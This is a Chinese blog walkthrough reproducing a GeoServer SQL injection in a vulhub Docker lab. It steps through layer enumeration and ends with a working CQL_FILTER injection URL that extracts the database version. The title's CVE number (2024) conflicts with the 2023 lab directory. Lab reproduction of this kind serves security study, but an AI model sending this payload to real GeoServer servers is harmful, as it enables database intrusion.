当前位置:   article > 正文

GeoServer SQL 注入漏洞复现(CVE-2024-25157)附poc_geoserverl漏洞_geoserver注入

geoserver注入

cd vulhub-master/
cd geoserver/
cd CVE-2023-25157
docker-compose up -d
docker-compose ps


1.访问http://yourip:8080/geoserver进入首页


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/370715e835e742118f6c9600ebba8e2f.png#pic_center)


2.获取每个功能名称


在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数


访问以下url获取:  
 http://192.168.43.161:8080/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities


`<Name>`标签中的信息,就是地理图层列表。这里选择`vulhub:example`作为地理图层列表信息  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/4843d59ffb8f48baac3871cac2f6f192.png#pic_center)


3.获取功能的属性


将上一步获取的typeName的name属性值拼接到url中,构成url如下:  
 http://192.168.43.161:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&maxFeatures=1&outputFormat=json  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/6720b716137b431cbd676b2305c88a3f.png#pic_center)


4.构造SQL 注入  
 Feature type (table) name: vulhub:example  
 One of attribute from feature type: name  
 利用这些已知参数,拼接成payload:  
 http://192.168.43.161:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL\_FILTER=strStartsWith(name,%27x%27%27)%20=%20true%20and%201=(SELECT%20CAST%20((SELECT%20version())%20AS%20integer))%20–%20%27)%20=%20true


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/69d077d20a734b5fa0a8f2d
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/917465
推荐阅读
相关标签
  

闽ICP备14008679号